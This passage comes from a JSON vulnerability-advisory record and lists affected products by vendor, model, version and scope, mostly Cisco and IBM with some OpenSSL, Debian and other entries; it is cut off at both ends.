"0" }, { "model": "websphere application server liberty pr", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.0-" }, { "model": "spa122 ata with router", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.5" }, { "model": "media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meeting center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "webex node for mcs", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.12.9.8" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2.8" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "cloud manager with openstack interix fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "unified sip proxy", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.2(1)" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "identifi", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "10.01" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media players series 5.4 rb", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.11-28" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "qradar", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.31" }, { "model": "prime optical for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "pureapplication system", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.2.1" }, { "model": "project openssl 1.0.2c", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "abyp-2t-1s-1l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90006.2.17" }, { "model": "icewall sso agent option", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10" }, { "model": "nac appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.19" }, { "model": "security network controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5.0.997" }, { "model": "anyconnect secure mobility client for os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.3" }, { "model": "unified ip phone series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "lancope stealthwatch flowsensor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "connected analytics for collaboration 1.0.1q", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.20" }, { "model": "jabber guest", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.0" }, { "model": "abyp-2t-1s-1l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(2)" }, { "model": "identifi wireless", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "10.11.1" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "mmp server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30.0-13" }, { "model": "abyp-10g-2sr-2lr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "computer telephony integration object server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.51" }, { "model": "unified communications for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.6.7" }, { "model": "prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.3.4.2-4" }, { "model": "anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "ons series multiservice provisioning platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1545410.6.1" }, { "model": "protectier enterprise edition ts7650g", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-3.2" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70104.4" }, { "model": "flex system fabric cn4093 10gb converged scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.14.0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.7.0" }, { "model": "packet tracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "agent for openflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.0.7" }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "cognos business intelligence interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.117" }, { "model": "unified contact center enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.51" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(3)" }, { "model": "webex meetings for wp8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.0" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "abyp-2t-2s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.6.5" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.5.0" }, { "model": "webex meetings for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.1" }, { "model": "mds series multilayer switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "ios software and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.3.1" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "webex meeting center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.0.5" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.01" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.15-36" }, { "model": "ace application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.0" }, { "model": "proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2.10" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1)" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network controller 1.0.3387m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "mobile foundation consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings client hosted t31r1sp6", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "cloud manager with openstack interim fix1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network controller 1.0.3379m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60002.8" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3x000" }, { "model": "packet tracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.3" }, { "model": "unified sip proxy", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0" }, { "model": "abyp-0t-4s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "spa50x series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "16.1.2" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "abyp-4ts-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.5" }, { "model": "ata series analog terminal adaptor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1901.3" }, { "model": "digital media players series 5.4 rb", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.4" }, { "model": "virtualization experience media engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "abyp-10g-4lr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3200" }, { "model": "abyp-10g-4lr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "sterling connect:direct for hp nonstop ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.6.0.1030" }, { "model": "video surveillance ptz ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.8" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.6" }, { "model": "unified communications for microsoft lync", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa122 ata with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4" }, { "model": "identity services engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "webex meetings server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.7" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.2" }, { "model": "rackswitch g8124/g8124-e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11.7.0" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "16.2" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(2.10000.5)" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.0" }, { "model": "telepresence mx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3204.4" }, { "model": "helion openstack", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "qradar siem/qrif/qrm/qvm patch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.71" }, { "model": "rackswitch g8332", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.23.0" }, { "model": "digital media players series 5.3 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "telepresence profile series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.41" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v5000-" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.3.5" }, { "model": "abyp-0t-0s-4l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.11.6" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "jabber for android mr", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "project openssl 1.0.2a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "websphere application server liberty pr", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.6-" }, { "model": "abyp-4t-0s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.00" }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "connected grid router-cgos", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "21.1.1" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2919" }, { "model": "websphere application server liberty pr", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.2-" }, { "model": "eos", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "8.61.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "lancope stealthwatch smc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on virtual machine mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "anyconnect secure mobility client", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "unified ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69450" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60008.3" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30.2-9" }, { "model": "abyp-0t-2s-2l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70008.3" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.2" }, { "model": "webex meetings server ssl gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ironport email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "prime collaboration provisioning", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.2" }, { "model": "protectier gateway for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "spa30x series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "helion openstack", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "extremexos", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "21.1.2" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30-12" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "webex meetings client on premises", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.3" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70100" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.3(1)" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4" }, { "model": "rackswitch g8124/g8124-e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.17.0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "protectier appliance edition ts7650ap1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-3.3" }, { "model": "security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.12" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2.2" }, { "model": "rackswitch g8052", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11.7.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5(.1.131)" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.5.5" }, { "model": "purview", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.1(1)" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "algo audit and compliance if", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.32" }, { "model": "spa525g", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rackswitch g8264t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.17.0" }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.4" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "summit wm3000 series", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "0" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "protectier gateway for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "protectier enterprise edition ts7650g", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-1.2" }, { "model": "abyp-0t-2s-2l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "xenserver", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "6.1" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9971" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.29-9" }, { "model": "series ip phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "protectier gateway for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3" }, { "model": "abyp-2t-0s-2l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "nexus series switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "spa112 2-port phone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.5" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.6" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3387" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.1.1" }, { "model": "websphere application server liberty pr", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.8-" }, { "model": "abyp-10g-4sr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "webex messenger service", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.20" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "telepresence server mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70104.2" }, { "model": "media experience engines", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2" }, { "model": "protectier appliance edition ts7650ap1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-1.2" }, { "model": "security network controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.3.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "connected grid router 15.6.2.15t", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "digital media players series 5.4 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "telepresence server on multiparty media mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3204.2" }, { "model": "cloupia unified infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "hosted collaboration mediation fulfillment", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5:20" }, { "model": "android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.1.1" }, { "model": "jabber for mac", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7" }, { "model": "protectier entry edition ts7610 ts7620", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-/3.4" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "counter fraud management for safer payments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.0" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.14.0" }, { "model": "telepresence server on multiparty media mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3104.2" }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70006.2.17" }, { "model": "digital media players series 5.3 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.0" }, { "model": "project openssl 1.0.1n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3204.1" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "packet tracer", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.0" }, { "model": "network analysis module", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.3.1" }, { "model": "image construction and composition tool build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.3.2.028" }, { 